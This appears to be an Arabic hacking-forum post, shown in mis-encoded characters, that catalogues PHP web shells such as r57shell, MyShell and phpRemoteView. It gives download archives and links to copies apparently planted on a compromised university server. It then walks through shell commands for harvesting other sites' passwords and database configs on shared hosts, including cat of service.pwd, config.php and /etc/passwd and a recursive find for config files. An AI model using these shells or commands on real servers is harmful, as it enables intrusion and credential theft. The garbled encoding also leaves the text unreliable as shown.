ÈÓã Çááå ÇáÑÍãä ÇáÑÍíã


Çáíæã ãæÖæÚäÇ Óåá ãÑå æåæ Úä ÇáÔá æÃæÇãÑå

æåÐÇ ÔíÁ ÖÑæÑí ãÚÑÝÊå æÃÊæÞÚ Åä ÃßËÑßã

íÚÑÝ ÇáÔá æÃæÇãÑå áßä æÖÚÊå áØáÈ ÇáßËíÑ ãä ÇáÃÚÖÇÁ .

000

Ýí åÐÇ ÇáãæÖæÚ ÑÇÍ ÃÊßáã Úä ÃÝÖá æÃÓåá ÓßÑÈÊÇÊ ÇáÔá

æßá Ôá ãÚå ÇáÑÇÈØ áÊÍãíáå æÇáÔáÇÊ Çááí ÃäÕÍßã ÝíåÇ

æÖÚÊ áßã ãËÇá ÚáíåÇ Úáì ÓíÑÝÑ ãÎÊÑÞ .


webadmin



Ôá Ìãíá ÌÏÇð æãÇ íÍÊÇÌ ÃæÇãÑ áíäßÓ æÓåá ÌÏÇð ÌÏÇð

æãä ÎÕÇÆÕå :

ÑÝÚ ãáÝÇÊ ÈÓåæáå

ÅäÔÇÁ ãÌáÏÇÊ ÈÓåæáå

áÊØÈíÞ ÃãÑ ãÚíä Úáì ÃÍÏ ÇáãáÝÇÊ ßá ãÇÚáíß ÝÚáå åæ ÇáÖÛØ Úáì ÇáãßÇä ÇáÝÇÑÛ ÃãÇãå

æÓæÝ ÊÙåÑ áß ÞÇÆãå Èßá ãÇÊÑíÏ Úãáå ãä ÍÐÝ æÊÚÏíá æÊÍãíá æÛíÑå

æÃíÖÇð ÊÓÊØíÚ ÍÐÝ ãÌáÏ Èßá ãÍÊæíÇÊå ÈÖÛØÉ ÒÑ .


ÑÇÈØ ÇáÊÍãíá :

webadmin.zip

ÑÇÈØ ÇáÔá Úáì ÇáÓíÑÝÑ :

http://web.skku.edu/~hakmu/zb41pl4/...de/webadmin.php



Myshell



Ôá Ìãíá ÌÏÇð æíÚÊãÏ Úáì ÃæÇãÑ áíäßÓ


ãä ÎÕÇÆÕå :


ãÚÑÝÉ ÕáÇÍíÊß ÈÌÇäÈ ÇáÌãáÉ Current User

æãÚÑÝÉ Ãíä ãæÞÚß Úáì ÇáÓíÑÝÑ æÃÞÕÏ ÈÃí ãÌáÏ

ãÚÑÝÉ ßá ÇáãÌáÏÇÊ ÇáãæÌæÏÉ Ýí ÇáãÌáÏ ÇáÐí ÊÊÕÝÍå

ÑÇÈØ ÇáÊÍãíá :


MyShell-1.0.6.zip

ÑÇÈØ ÇáÔá Úáì ÇáÓíÑÝÑ :

http://web.skku.edu/~hakmu/zb41pl4/...Shell-1.0.6.php


phpRemoteView

Ôá Ìãíá ÌÏÇð æÎÕÇÆÕå ßËíÑå ÌÏÇð

æÈÚÖ ÎÕÇÆÕå ãÔÇÈåå áÎÕÇÆÕ webadmin

æááÊÚÏíá Úáì ÇáãáÝÇÊ ÅÓÊÎÏã ÇáÃÓåã ÇáãÞÇÈáå áÃÓãÇÆåÇ


ÑÇÈØ ÇáÊÍãíá :


phpRemoteView.zip

ÑÇÈØ ÇáÔá Úáì ÇáÓíÑÝÑ :

http://web.skku.edu/~hakmu/zb41pl4/...pRemoteView.php


phpshell-1.7



Ôá Ìãíá æÔÈíå ÈÇáÔá Myshell

ÑÇÈØ ÇáÊÍãíá :


phpShell-1.7.zip


ÑÇÈØ ÇáÔá Úáì ÇáÓíÑÝÑ:

http://web.skku.edu/~hakmu/zb41pl4/...de/phpshell.php


phpFileManager



Ôá ÑÇÆÚ ÌÏÇð æÓåá æÃæÇãÑå æÇÖÍå ÌÏÇð

ÑÇÈØ ÇáÊÍãíá :


phpFileManager.zip

ÑÇÈØ ÇáÔá Úáì ÇáÓíÑÝÑ :

http://web.skku.edu/~hakmu/zb41pl4/...pcode/index.php


r57shell


ÇáÔá ÇáÑÇÆÚ ÌÏÇð æÇáÛäí Úä ÇáÊÚÑíÝ æåæ ÇáÅÕÏÇÑ ÇáÃÎíÑ

Ôá Óåá ÌÏÇð æÎÕÇÆÕå ßËíÑÉ ÌÏÇð

æãäåÇ ÃæÇãÑ ÇáÈÍË Úä ãáÝÇÊ ãËá config.php ÌÇåÒÉ æÃíÖÇð ÃãÑ ÓÍÈ

ÇáãáÝÇÊ wget ÌÇåÒ æÛíÑå ÇáßËíÑ .


ÑÇÈØ ÇáÊÍãíá :


R57Shell.zip

ÑÇÈØ ÇáÔá Úáì ÇáÓíÑÝÑ :

http://web.skku.edu/~hakmu/zb41pl4/...de/r57shell.php


phplab

Ôá Ìãíá áßä ÛíÑ Úãáí æáÇ ÃäÕÍ ÇáãÈÊÏÆíä Èå


ÑÇÈØ ÇáÊÍãíá :


phpLab.zip



haexplorer

Ôá Ìãíá áßä ÛíÑ Úãáí æáÇ ÃäÕÍ ÇáãÈÊÏÆíä Èå

ÑÇÈØ ÇáÊÍãíá :


haexplorer.zip




php exploit lab

Ôá Ìãíá áßä ÛíÑ Úãáí æáÇ ÃäÕÍ ÇáãÈÊÏÆíä Èå

ÑÇÈØ ÇáÊÍãíá :


php exploit lab.zip




ßíÝ ÊÓÊÎÏã ÇáÔá + ÃæÇãÑ ÇááíäßÓ ÇáÊí Êåãß Ýí ÇáÅÎÊÑÇÞ


ÓíÊã ÇáÊØÈíÞ Úáì ÇáÔá Myshell áÓåæáÊå æáßËÑÉ ÅÓÊÎÏÇãå


ÇáÕæÑÉ :



1- ãßÇä æÖÚ ÃæÇãÑ ÇááíäßÓ

2- ÈÚÏ æÖÚ ÃæÇãÑ ÇááíäßÓ ÊÖÛØ Úáíå áßí íÊã ÇáÊØÈíÞ

3- ÕáÇÍíÇÊß

4- ãæÞÚß Úáì ÇáÓíÑÝÑ


5- ÇáãÌáÏÇÊ ÇáãæÌæÏÉ ÈÇáãßÇä ÇáÐí ÊÊÕÝÍå

ÇáÃæÇãÑ ÇáÊí Êåãß Ýí ÇáÅÎÊÑÇÞ


ÇáÃãÑ


cat /home/*/public_html/_vti_pvt/service.pwd


ÃãÑ ÌáÈ ÈÇÓæÑÏÇÊ ÇáãæÇÞÚ ÇáÊí ÊÓÊÎÏã ÇáÝÑæäÊ ÈíÌ


ÇáÇãÑ


cat /home/*/public_html/_vti_pvt/access.cnf


ÃãÑ ãÚÑÝÉ ÃÓÇãí ÇáãæÇÞÚ ÇáÊí ÊÓÊÎÏã ÇáÝÑæäÊ ÈíÌ


ÇáÃãÑ


cat /home/*/public_html/*/admin/config.php

cat /home/*/public_html/*/admincp/config.php


ÃãÑ ÚÑÖ ãáÝÇÊ ÇáÜÜ config.php ááÈÑÇãÌ ÇáãËÈÊå Úáì ÇáãæÇÞÚ ãËá


ÇáãäÊÏíÇÊ æÇáãÌáÇÊ æÛíÑåÇ ããä ÊÓÊÎÏã ãáÝÇÊ ÇáÜÜ config


ÃãÑ


cat /etc/domainalias


ÚÑÖ ÇáãæÇÞÚ ãÚ ÃÓÇãí ÇáãÓÊÎÏãíä


ÃãÑ


find / -name config.php


ÇáÈÍË Úä ÌãíÚ ÇáãáÝÇÊ ÇáÊí ÅÓãåÇ config.php

æÓÊØíÚ ÇáÈÍË Ýí åÐÇ ÇáÃãÑ Úä Ãí ãáÝ ÊÑíÏ


ÃãÑ


cat /etc/passwd


íÙåÑ ÌãíÚ ÈÇÓæÑÏÇÊ ÇáãæÇÞÚ ÇáÊí Úáì ÇáÓíÑÝÑ

æÅÐÇ ßÇä Çááí ÙåÑ áß ÈÇáØÑíÞå åÐí

carlos:vmYQDR1pWRVLE

ãÚäÇåÇ Çä carlos ÅÓã ÇáãæÞÚ

æÅä vmYQDR1pWRVLE åæ ÇáÈÇÓæÑÏ ÇáãÔÝÑ

ÃãÇ Åä ØáÚ áß ÈÇáØÑíÞå åÐí

carlos:x

ÝãÚäì ÇáÜÜ x Çä ÇáÈÇÓæÑÏ ãÎÝí æãÇ ÊÞÏÑ ÊÔæÝå

ÇáÃä ÔÑÍ ááÃæÇãÑ ÇáÊí ÐßÑäÇåÇ

cat /home/*/public_html/*/admin/config.php


cat ÃãÑ ÚÑÖ ãáÝÇÊ ÏÝÚå æÇÍÏå


home ÇáãÌáÏ ÇáÐí íæÖÚ Ýíå ÇáãæÇÞÚ


* ãßÇä ÅÓã ÇáãæÞÚ æÇÓÊÈÏáäÇå ÈÇáäÌãå ÍÊì íÙåÑ áäÇ ÇáÌãíÚ


public_html ÇáãÌáÏ ÇáÑÆíÓí ÇáÐí íæÖÚ Ýíå ãáÝÇÊ ÇáãæÇÞÚ


* ÅÓã ÇáãÌáÏ ÇáÐí íæÖÚ Ýíå ÇáÈÑÇãÌ ãËá ÇáãäÊÏíÇÊ æÇáãÌáÏÇÊ æÛíÑåÇ

æÇÓÊÈÏáäÇå ÈÇáäÌãÉ ÍÊì íÙåÑ ÇáÌãíÚ


admin ÅÓã ãÌáÏ áæÍÉ ÇáÊÍßã

config.php ÇáãáÝ ÇáÐí íæÖÚ Ýíå ÈíÇäÇÊ ÞÇÚÏÉ ÇáÈíÇäÇÊ

æÈÇÞí ÇáÃæÇãÑ ÔÑÍåÇ ÔÈíå ÈÇáÔÑÍ åÐÇ

ãÚ ÇáÚáã Ãä ÃÓÇãí ÇáãÌáÏÇÊ ãä Çáããßä Ãä Êßæä ãÎÊáÝå Ãæ Ãä íÊã ÊÛííÑåÇ

ÈÓ ÇäÊåì

kakarotto

ãäÞæá ááÇÝÇÏÉ
__________________